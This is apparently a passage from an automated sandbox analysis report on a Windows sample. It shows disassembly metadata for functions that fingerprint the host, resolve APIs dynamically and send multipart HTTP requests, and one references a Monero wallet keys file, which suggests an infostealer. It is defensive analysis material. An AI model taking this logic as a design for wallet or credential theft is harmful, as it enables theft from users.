                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 96d72d62e4d946fcb57dc61b182a9792f3c3830ef22cb55c4a87b0dfce92a96f
                                  • Instruction ID: 9a198764754a49dde8a19e2148a37b6cc534f2eeeba10c8dabf294125e3223c3
                                  • Opcode Fuzzy Hash: 96d72d62e4d946fcb57dc61b182a9792f3c3830ef22cb55c4a87b0dfce92a96f
                                  • Instruction Fuzzy Hash: D87170B1A44218EBDB24DFD4DC59BEEB7B5AF44300F108199F1066B1D4DBB86A84CF51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 717690-7176da GetWindowsDirectoryA 1357 7176e3-717757 GetVolumeInformationA call 718e90 * 3 1356->1357 1358 7176dc 1356->1358 1365 717768-71776f 1357->1365 1358->1357 1366 717771-71778a call 718e90 1365->1366 1367 71778c-7177a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 7177a9-7177b6 call 71aa50 1367->1369 1370 7177b8-7177e8 wsprintfA call 71aa50 1367->1370 1377 71780e-71781e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007176D2
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0071770F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00717793
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0071779A
                                  • wsprintfA.USER32 ref: 007177D0
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: bb9f4ab7524d446c4aa76824bb886a84aebb1fb714ee01fb70d14e5e6d46cd05
                                  • Instruction ID: 63269f8e5d9a4cfcc03639d35e053c28e2f824944fdb78133f846de1caddfe5c
                                  • Opcode Fuzzy Hash: bb9f4ab7524d446c4aa76824bb886a84aebb1fb714ee01fb70d14e5e6d46cd05
                                  • Instruction Fuzzy Hash: 1F41A5B1D49258EBDB10DF98CC45BDEBBB8AF08700F104099F609A72C0D7786A84CBA5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007011B7), ref: 00717A10
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00717A17
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00717A2F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: c959fc30b0c64d899429d0599aaeb726770754800ffb4af1d43c859498a41469
                                  • Instruction ID: 167545f4678c57ee47e6755cbf9dcb6969dd79c9d32c4f5e0e2a67eb362a304c
                                  • Opcode Fuzzy Hash: c959fc30b0c64d899429d0599aaeb726770754800ffb4af1d43c859498a41469
                                  • Instruction Fuzzy Hash: B9F0AFB1948209EFC700CFC8DC45BAEFBB8EB09711F10021AF615A2280D3741940CBA0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: e92ceaeea79ff2568ee4460bab1bdfcd71f1c28f59f833bf2badd50a4049f1c5
                                  • Instruction ID: 959831b62681747a2eee273b0ec3859621cd5e1eaae4959990e9ef0ab462174b
                                  • Opcode Fuzzy Hash: e92ceaeea79ff2568ee4460bab1bdfcd71f1c28f59f833bf2badd50a4049f1c5
                                  • Instruction Fuzzy Hash: F9D05E7494D30DEBCB04DFE098496DDFB78BB08315F400655D90562240FA306481CA65

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 719f20-719f2a 634 719f30-71a341 GetProcAddress * 43 633->634 635 71a346-71a3da LoadLibraryA * 8 633->635 634->635 636 71a456-71a45d 635->636 637 71a3dc-71a451 GetProcAddress * 5 635->637 638 71a463-71a521 GetProcAddress * 8 636->638 639 71a526-71a52d 636->639 637->636 638->639 640 71a5a8-71a5af 639->640 641 71a52f-71a5a3 GetProcAddress * 5 639->641 642 71a5b5-71a642 GetProcAddress * 6 640->642 643 71a647-71a64e 640->643 641->640 642->643 644 71a654-71a72a GetProcAddress * 9 643->644 645 71a72f-71a736 643->645 644->645 646 71a7b2-71a7b9 645->646 647 71a738-71a7ad GetProcAddress * 5 645->647 648 71a7bb-71a7e7 GetProcAddress * 2 646->648 649 71a7ec-71a7f3 646->649 647->646 648->649 650 71a825-71a82c 649->650 651 71a7f5-71a820 GetProcAddress * 2 649->651 652 71a922-71a929 650->652 653 71a832-71a91d GetProcAddress * 10 650->653 651->650 654 71a92b-71a988 GetProcAddress * 4 652->654 655 71a98d-71a994 652->655 653->652 654->655 656 71a996-71a9a9 GetProcAddress 655->656 657 71a9ae-71a9b5 655->657 656->657 658 71a9b7-71aa13 GetProcAddress * 4 657->658 659 71aa18-71aa19 657->659 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,011C53E0), ref: 00719F3D
                                  • GetProcAddress.KERNEL32(75900000,011C5400), ref: 00719F55
                                  • GetProcAddress.KERNEL32(75900000,011D9638), ref: 00719F6E
                                  • GetProcAddress.KERNEL32(75900000,011D96B0), ref: 00719F86
                                  • GetProcAddress.KERNEL32(75900000,011DD688), ref: 00719F9E
                                  • GetProcAddress.KERNEL32(75900000,011DD610), ref: 00719FB7
                                  • GetProcAddress.KERNEL32(75900000,011CAAB8), ref: 00719FCF
                                  • GetProcAddress.KERNEL32(75900000,011DD670), ref: 00719FE7
                                  • GetProcAddress.KERNEL32(75900000,011DD520), ref: 0071A000
                                  • GetProcAddress.KERNEL32(75900000,011DD6A0), ref: 0071A018
                                  • GetProcAddress.KERNEL32(75900000,011DD550), ref: 0071A030
                                  • GetProcAddress.KERNEL32(75900000,011C5420), ref: 0071A049
                                  • GetProcAddress.KERNEL32(75900000,011C5440), ref: 0071A061
                                  • GetProcAddress.KERNEL32(75900000,011C5460), ref: 0071A079
                                  • GetProcAddress.KERNEL32(75900000,011C5540), ref: 0071A092
                                  • GetProcAddress.KERNEL32(75900000,011DD598), ref: 0071A0AA
                                  • GetProcAddress.KERNEL32(75900000,011DD6B8), ref: 0071A0C2
                                  • GetProcAddress.KERNEL32(75900000,011CABD0), ref: 0071A0DB
                                  • GetProcAddress.KERNEL32(75900000,011C54C0), ref: 0071A0F3
                                  • GetProcAddress.KERNEL32(75900000,011DD5E0), ref: 0071A10B
                                  • GetProcAddress.KERNEL32(75900000,011DD628), ref: 0071A124
                                  • GetProcAddress.KERNEL32(75900000,011DD5C8), ref: 0071A13C
                                  • GetProcAddress.KERNEL32(75900000,011DD538), ref: 0071A154
                                  • GetProcAddress.KERNEL32(75900000,011C51C0), ref: 0071A16D
                                  • GetProcAddress.KERNEL32(75900000,011DD640), ref: 0071A185
                                  • GetProcAddress.KERNEL32(75900000,011DD5F8), ref: 0071A19D
                                  • GetProcAddress.KERNEL32(75900000,011DD5B0), ref: 0071A1B6
                                  • GetProcAddress.KERNEL32(75900000,011DD658), ref: 0071A1CE
                                  • GetProcAddress.KERNEL32(75900000,011DD580), ref: 0071A1E6
                                  • GetProcAddress.KERNEL32(75900000,011DD568), ref: 0071A1FF
                                  • GetProcAddress.KERNEL32(75900000,011DD6D0), ref: 0071A217
                                  • GetProcAddress.KERNEL32(75900000,011DD040), ref: 0071A22F
                                  • GetProcAddress.KERNEL32(75900000,011DD088), ref: 0071A248
                                  • GetProcAddress.KERNEL32(75900000,011DA628), ref: 0071A260
                                  • GetProcAddress.KERNEL32(75900000,011DCF98), ref: 0071A278
                                  • GetProcAddress.KERNEL32(75900000,011DD1A8), ref: 0071A291
                                  • GetProcAddress.KERNEL32(75900000,011C51A0), ref: 0071A2A9
                                  • GetProcAddress.KERNEL32(75900000,011DD058), ref: 0071A2C1
                                  • GetProcAddress.KERNEL32(75900000,011C51E0), ref: 0071A2DA
                                  • GetProcAddress.KERNEL32(75900000,011DD0A0), ref: 0071A2F2
                                  • GetProcAddress.KERNEL32(75900000,011DD130), ref: 0071A30A
                                  • GetProcAddress.KERNEL32(75900000,011C4E60), ref: 0071A323
                                  • GetProcAddress.KERNEL32(75900000,011C4E80), ref: 0071A33B
                                  • LoadLibraryA.KERNEL32(011DD178,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A34D
                                  • LoadLibraryA.KERNEL32(011DD1F0,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A35E
                                  • LoadLibraryA.KERNEL32(011DD118,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A370
                                  • LoadLibraryA.KERNEL32(011DD070,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A382
                                  • LoadLibraryA.KERNEL32(011DCF20,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A393
                                  • LoadLibraryA.KERNEL32(011DCF80,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A3A5
                                  • LoadLibraryA.KERNEL32(011DD0B8,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A3B7
                                  • LoadLibraryA.KERNEL32(011DD0D0,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A3C8
                                  • GetProcAddress.KERNEL32(75FD0000,011C5120), ref: 0071A3EA
                                  • GetProcAddress.KERNEL32(75FD0000,011DD0E8), ref: 0071A402
                                  • GetProcAddress.KERNEL32(75FD0000,011D9280), ref: 0071A41A
                                  • GetProcAddress.KERNEL32(75FD0000,011DD100), ref: 0071A433
                                  • GetProcAddress.KERNEL32(75FD0000,011C5040), ref: 0071A44B
                                  • GetProcAddress.KERNEL32(734B0000,011CAE28), ref: 0071A470
                                  • GetProcAddress.KERNEL32(734B0000,011C4F20), ref: 0071A489
                                  • GetProcAddress.KERNEL32(734B0000,011CADB0), ref: 0071A4A1
                                  • GetProcAddress.KERNEL32(734B0000,011DD1C0), ref: 0071A4B9
                                  • GetProcAddress.KERNEL32(734B0000,011DCFB0), ref: 0071A4D2
                                  • GetProcAddress.KERNEL32(734B0000,011C4DE0), ref: 0071A4EA
                                  • GetProcAddress.KERNEL32(734B0000,011C4EC0), ref: 0071A502
                                  • GetProcAddress.KERNEL32(734B0000,011DCF38), ref: 0071A51B
                                  • GetProcAddress.KERNEL32(763B0000,011C5060), ref: 0071A53C
                                  • GetProcAddress.KERNEL32(763B0000,011C4F80), ref: 0071A554
                                  • GetProcAddress.KERNEL32(763B0000,011DCFF8), ref: 0071A56D
                                  • GetProcAddress.KERNEL32(763B0000,011DCFC8), ref: 0071A585
                                  • GetProcAddress.KERNEL32(763B0000,011C4DC0), ref: 0071A59D
                                  • GetProcAddress.KERNEL32(750F0000,011CAA90), ref: 0071A5C3
                                  • GetProcAddress.KERNEL32(750F0000,011CAE50), ref: 0071A5DB
                                  • GetProcAddress.KERNEL32(750F0000,011DCFE0), ref: 0071A5F3
                                  • GetProcAddress.KERNEL32(750F0000,011C4F40), ref: 0071A60C
                                  • GetProcAddress.KERNEL32(750F0000,011C4E40), ref: 0071A624
                                  • GetProcAddress.KERNEL32(750F0000,011CABF8), ref: 0071A63C
                                  • GetProcAddress.KERNEL32(75A50000,011DCF50), ref: 0071A662
                                  • GetProcAddress.KERNEL32(75A50000,011C5140), ref: 0071A67A
                                  • GetProcAddress.KERNEL32(75A50000,011D91E0), ref: 0071A692
                                  • GetProcAddress.KERNEL32(75A50000,011DD148), ref: 0071A6AB
                                  • GetProcAddress.KERNEL32(75A50000,011DCF68), ref: 0071A6C3
                                  • GetProcAddress.KERNEL32(75A50000,011C5180), ref: 0071A6DB
                                  • GetProcAddress.KERNEL32(75A50000,011C5160), ref: 0071A6F4
                                  • GetProcAddress.KERNEL32(75A50000,011DD160), ref: 0071A70C
                                  • GetProcAddress.KERNEL32(75A50000,011DD010), ref: 0071A724
                                  • GetProcAddress.KERNEL32(75070000,011C4FE0), ref: 0071A746
                                  • GetProcAddress.KERNEL32(75070000,011DD190), ref: 0071A75E
                                  • GetProcAddress.KERNEL32(75070000,011DD1D8), ref: 0071A776
                                  • GetProcAddress.KERNEL32(75070000,011DD208), ref: 0071A78F
                                  • GetProcAddress.KERNEL32(75070000,011DD028), ref: 0071A7A7
                                  • GetProcAddress.KERNEL32(74E50000,011C50E0), ref: 0071A7C8
                                  • GetProcAddress.KERNEL32(74E50000,011C4FC0), ref: 0071A7E1
                                  • GetProcAddress.KERNEL32(75320000,011C5080), ref: 0071A802
                                  • GetProcAddress.KERNEL32(75320000,011DD3E8), ref: 0071A81A
                                  • GetProcAddress.KERNEL32(6F060000,011C4DA0), ref: 0071A840
                                  • GetProcAddress.KERNEL32(6F060000,011C4EA0), ref: 0071A858
                                  • GetProcAddress.KERNEL32(6F060000,011C4E00), ref: 0071A870
                                  • GetProcAddress.KERNEL32(6F060000,011DD418), ref: 0071A889
                                  • GetProcAddress.KERNEL32(6F060000,011C5000), ref: 0071A8A1
                                  • GetProcAddress.KERNEL32(6F060000,011C50A0), ref: 0071A8B9
                                  • GetProcAddress.KERNEL32(6F060000,011C5020), ref: 0071A8D2
                                  • GetProcAddress.KERNEL32(6F060000,011C4EE0), ref: 0071A8EA
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0071A901
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0071A917
                                  • GetProcAddress.KERNEL32(74E00000,011DD430), ref: 0071A939
                                  • GetProcAddress.KERNEL32(74E00000,011D91F0), ref: 0071A951
                                  • GetProcAddress.KERNEL32(74E00000,011DD448), ref: 0071A969
                                  • GetProcAddress.KERNEL32(74E00000,011DD400), ref: 0071A982
                                  • GetProcAddress.KERNEL32(74DF0000,011C4E20), ref: 0071A9A3
                                  • GetProcAddress.KERNEL32(6E110000,011DD3D0), ref: 0071A9C4
                                  • GetProcAddress.KERNEL32(6E110000,011C50C0), ref: 0071A9DD
                                  • GetProcAddress.KERNEL32(6E110000,011DD2C8), ref: 0071A9F5
                                  • GetProcAddress.KERNEL32(6E110000,011DD298), ref: 0071AA0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 2fff0fc5339413343ac88f1efddb99eceb709421089cb889c56cae13337a1fe0
                                  • Instruction ID: bc394ead166b0342a7f10d6f47b076d538ead42828d96a69d3a45204fe02465a
                                  • Opcode Fuzzy Hash: 2fff0fc5339413343ac88f1efddb99eceb709421089cb889c56cae13337a1fe0
                                  • Instruction Fuzzy Hash: 49622EB65BE2509FC344DFE8FD88956B7B9A74D301310861BBA19C3274E734A9C0EB60

                                  Control-flow Graph

                                  control_flow_graph 801 7048d0-704992 call 71aab0 call 704800 call 71aa50 * 5 InternetOpenA StrCmpCA 816 704994 801->816 817 70499b-70499f 801->817 816->817 818 7049a5-704b1d call 718cf0 call 71ac30 call 71abb0 call 71ab10 * 2 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71ac30 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71ac30 call 71abb0 call 71ab10 * 2 InternetConnectA 817->818 819 704f1b-704f43 InternetCloseHandle call 71ade0 call 70a210 817->819 818->819 905 704b23-704b27 818->905 828 704f82-704ff2 call 718b20 * 2 call 71aab0 call 71ab10 * 8 819->828 829 704f45-704f7d call 71ab30 call 71acc0 call 71abb0 call 71ab10 819->829 829->828 906 704b35 905->906 907 704b29-704b33 905->907 908 704b3f-704b72 HttpOpenRequestA 906->908 907->908 909 704b78-704e78 call 71acc0 call 71abb0 call 71ab10 call 71ac30 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71ac30 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71ac30 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71acc0 call 71abb0 call 71ab10 call 71ac30 call 71abb0 call 71ab10 call 71aa50 call 71ac30 * 2 call 71abb0 call 71ab10 * 2 call 71ade0 lstrlen call 71ade0 * 2 lstrlen call 71ade0 HttpSendRequestA 908->909 910 704f0e-704f15 InternetCloseHandle 908->910 1021 704e82-704eac InternetReadFile 909->1021 910->819 1022 704eb7-704f09 InternetCloseHandle call 71ab10 1021->1022 1023 704eae-704eb5 1021->1023 1022->910 1023->1022 1024 704eb9-704ef7 call 71acc0 call 71abb0 call 71ab10 1023->1024 1024->1021
                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 00704800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00704889
                                    • Part of subcall function 00704800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00704899
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00704965
                                  • StrCmpCA.SHLWAPI(?,011DE920), ref: 0070498A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00704B0A
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00720DDE,00000000,?,?,00000000,?,",00000000,?,011DE930), ref: 00704E38
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00704E54
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00704E68
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00704E99
                                  • InternetCloseHandle.WININET(00000000), ref: 00704EFD
                                  • InternetCloseHandle.WININET(00000000), ref: 00704F15
                                  • HttpOpenRequestA.WININET(00000000,011DE8C0,?,011DE3B0,00000000,00000000,00400100,00000000), ref: 00704B65
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • InternetCloseHandle.WININET(00000000), ref: 00704F1F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: 0b28f7a604f003edc32b31f4fbb9a9797b74fd1f901305d7f0c4e5754e342459
                                  • Instruction ID: 8334919824ed8f741f984b6ec08189128eaede7900f612d271eb83c9ea3c7058
                                  • Opcode Fuzzy Hash: 0b28f7a604f003edc32b31f4fbb9a9797b74fd1f901305d7f0c4e5754e342459
                                  • Instruction Fuzzy Hash: C5120FB2A16158EACB24EB94DD66FEEB379AF14310F404199F106620D1DF382F88CF65

                                  Control-flow Graph

